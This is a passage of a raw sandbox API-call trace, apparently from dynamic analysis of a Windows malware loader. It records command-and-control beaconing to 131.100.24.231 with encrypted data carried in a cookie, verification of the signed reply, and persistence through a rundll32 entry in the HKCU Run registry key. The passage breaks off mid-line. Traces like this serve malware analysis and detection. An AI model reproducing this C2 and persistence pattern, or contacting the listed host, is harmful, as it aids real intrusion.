ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0453.203] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0453.204] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0453.204] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0453.204] FindClose (in: hFindFile=0x2a838e0 | out: hFindFile=0x2a838e0) returned 1 [0453.204] GetProcessHeap () returned 0x530000 [0453.204] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0453.204] GetProcessHeap () returned 0x530000 [0453.205] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7230 [0453.205] GetProcessHeap () returned 0x530000 [0453.205] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0453.205] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0453.207] GetProcessHeap () returned 0x530000 [0453.207] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7230 | out: hHeap=0x530000) returned 1 [0453.207] GetProcessHeap () returned 0x530000 [0453.207] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0453.207] GetProcessHeap () returned 0x530000 [0453.207] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0453.207] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0453.207] GetProcessHeap () returned 0x530000 [0453.207] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0453.207] GetProcessHeap () returned 0x530000 [0453.207] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0453.208] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0453.208] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0453.208] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0453.208] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0453.208] GetProcessHeap () returned 0x530000 [0453.208] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0453.208] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0453.208] GetProcessHeap () returned 0x530000 [0453.208] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76488 [0453.208] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0453.208] GetProcessHeap () returned 0x530000 [0453.208] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0453.208] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0453.208] GetProcessHeap () returned 0x530000 [0453.208] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb4) returned 0x2a7ac48 [0453.209] GetProcessHeap () returned 0x530000 [0453.209] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0453.209] GetProcessHeap () returned 0x530000 [0453.209] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0453.209] CryptBinaryToStringW (in: pbBinary=0x2a7ac48, cbBinary=0xb4, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0453.209] GetProcessHeap () returned 0x530000 [0453.209] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e2) returned 0x2acc570 [0453.209] CryptBinaryToStringW (in: pbBinary=0x2a7ac48, cbBinary=0xb4, dwFlags=0x40000001, pszString=0x2acc570, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsR24P/PcPPEAHpJ4EdrBpH8PHV+", pcchString=0x2cf504) returned 1 [0453.209] GetProcessHeap () returned 0x530000 [0453.209] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0453.210] GetProcessHeap () returned 0x530000 [0453.210] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63120 [0453.210] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: nREP=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsR24P/PcPPEAHpJ4EdrBpH8PHV+\r\n") returned 255 [0453.210] GetProcessHeap () returned 0x530000 [0453.210] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63120 | out: hHeap=0x530000) returned 1 [0453.210] GetProcessHeap () returned 0x530000 [0453.210] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc570 | out: hHeap=0x530000) returned 1 [0453.210] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0453.211] GetProcessHeap () returned 0x530000 [0453.211] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0453.211] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0453.213] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="mhpTspdGiezEmAKcdgBIJoesESjzlLqnQX", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0453.214] GetProcessHeap () returned 0x530000 [0453.214] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0453.214] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0453.214] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0453.214] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0453.214] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: nREP=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsR24P/PcPPEAHpJ4EdrBpH8PHV+\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0454.353] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0454.353] GetProcessHeap () returned 0x530000 [0454.353] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0454.354] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x2e0) returned 1 [0454.354] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b480e0, dwNumberOfBytesToRead=0xfd20, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b480e0*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0454.354] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0454.354] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0454.354] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0454.354] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0454.354] GetProcessHeap () returned 0x530000 [0454.354] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0454.354] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf51c) returned 0x0 [0454.354] GetProcessHeap () returned 0x530000 [0454.354] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0454.354] GetProcessHeap () returned 0x530000 [0454.354] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc858 [0454.354] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0454.355] GetProcessHeap () returned 0x530000 [0454.355] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0454.355] GetProcessHeap () returned 0x530000 [0454.355] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc858 | out: hHeap=0x530000) returned 1 [0454.356] GetProcessHeap () returned 0x530000 [0454.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0454.356] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0454.356] GetProcessHeap () returned 0x530000 [0454.356] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0454.356] GetProcessHeap () returned 0x530000 [0454.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7a948 [0454.356] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7a948, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7a948) returned 0x0 [0454.356] BCryptHashData (in: hHash=0x2a7a950, pbInput=0x2a764d0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7a950) returned 0x0 [0454.356] BCryptFinishHash (in: hHash=0x2a7a950, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7a950, pbOutput=0x2cf510) returned 0x0 [0454.356] BCryptDestroyHash (in: hHash=0x2a7a950 | out: hHash=0x2a7a950) returned 0x0 [0454.356] GetProcessHeap () returned 0x530000 [0454.356] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7a948 | out: hHeap=0x530000) returned 1 [0454.356] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0454.356] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a7648c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0454.358] GetProcessHeap () returned 0x530000 [0454.358] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c710 [0454.358] GetProcessHeap () returned 0x530000 [0454.359] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0454.359] GetProcessHeap () returned 0x530000 [0454.360] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0454.360] GetProcessHeap () returned 0x530000 [0454.360] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0454.360] GetProcessHeap () returned 0x530000 [0454.360] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0454.361] GetProcessHeap () returned 0x530000 [0454.361] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0454.361] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0454.361] GetProcessHeap () returned 0x530000 [0454.361] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0454.361] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",moHwsQoQIjeAvTz") returned 105 [0454.361] GetProcessHeap () returned 0x530000 [0454.361] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0454.361] GetProcessHeap () returned 0x530000 [0454.361] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0454.361] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0454.362] GetProcessHeap () returned 0x530000 [0454.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0454.362] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",moHwsQoQIjeAvTz") returned 105 [0454.362] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",moHwsQoQIjeAvTz", cbData=0xd4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",moHwsQoQIjeAvTz") returned 0x0 [0454.363] RegCloseKey (hKey=0x670) returned 0x0 [0454.364] GetProcessHeap () returned 0x530000 [0454.364] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c710 | out: hHeap=0x530000) returned 1 [0454.364] GetProcessHeap () returned 0x530000 [0454.365] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0454.365] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe6151) returned 0x102 [0464.370] GetProcessHeap () returned 0x530000 [0464.370] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0464.370] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0464.370] GetProcessHeap () returned 0x530000 [0464.371] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0464.373] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0464.373] GetProcessHeap () returned 0x530000 [0464.373] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0464.373] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0464.373] GetProcessHeap () returned 0x530000 [0464.373] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0464.373] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0464.376] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0464.376] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0464.376] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0464.376] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0464.376] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0464.376] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0464.377] GetProcessHeap () returned 0x530000 [0464.377] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0464.377] GetProcessHeap () returned 0x530000 [0464.377] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0464.377] GetProcessHeap () returned 0x530000 [0464.377] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc858 [0464.377] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0464.378] GetProcessHeap () returned 0x530000 [0464.378] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0464.378] GetProcessHeap () returned 0x530000 [0464.378] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc858 | out: hHeap=0x530000) returned 1 [0464.378] GetProcessHeap () returned 0x530000 [0464.378] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0464.379] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0464.379] GetProcessHeap () returned 0x530000 [0464.379] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0464.379] GetProcessHeap () returned 0x530000 [0464.379] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0464.379] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0464.379] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0464.379] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0464.379] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0464.379] GetProcessHeap () returned 0x530000 [0464.380] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0464.380] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0464.380] GetProcessHeap () returned 0x530000 [0464.380] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76488 [0464.380] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0464.380] GetProcessHeap () returned 0x530000 [0464.380] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0464.380] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0464.380] GetProcessHeap () returned 0x530000 [0464.381] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x11d) returned 0x2a49848 [0464.381] GetProcessHeap () returned 0x530000 [0464.381] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0464.381] GetProcessHeap () returned 0x530000 [0464.381] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0464.381] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x11d, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0464.382] GetProcessHeap () returned 0x530000 [0464.382] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2fa) returned 0x2a89708 [0464.382] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x11d, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThXO1dGvAJC766MdkQYW+uPRWaeo8MIFZDiGa7A7x8TElWt+Cl4ih/fjPB4P2JVDGtJuepRJPl67bI45WQKahZPxv1bOkB5Ks06xPU6qqQuVmappHFpfLIxK21u7pU8+DaT2mlOq0QqcX+EHtSFcmSIGTZx4QI53/Np7zkCS", pcchString=0x2cf504) returned 1 [0464.382] GetProcessHeap () returned 0x530000 [0464.382] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0464.382] GetProcessHeap () returned 0x530000 [0464.382] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0464.382] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: 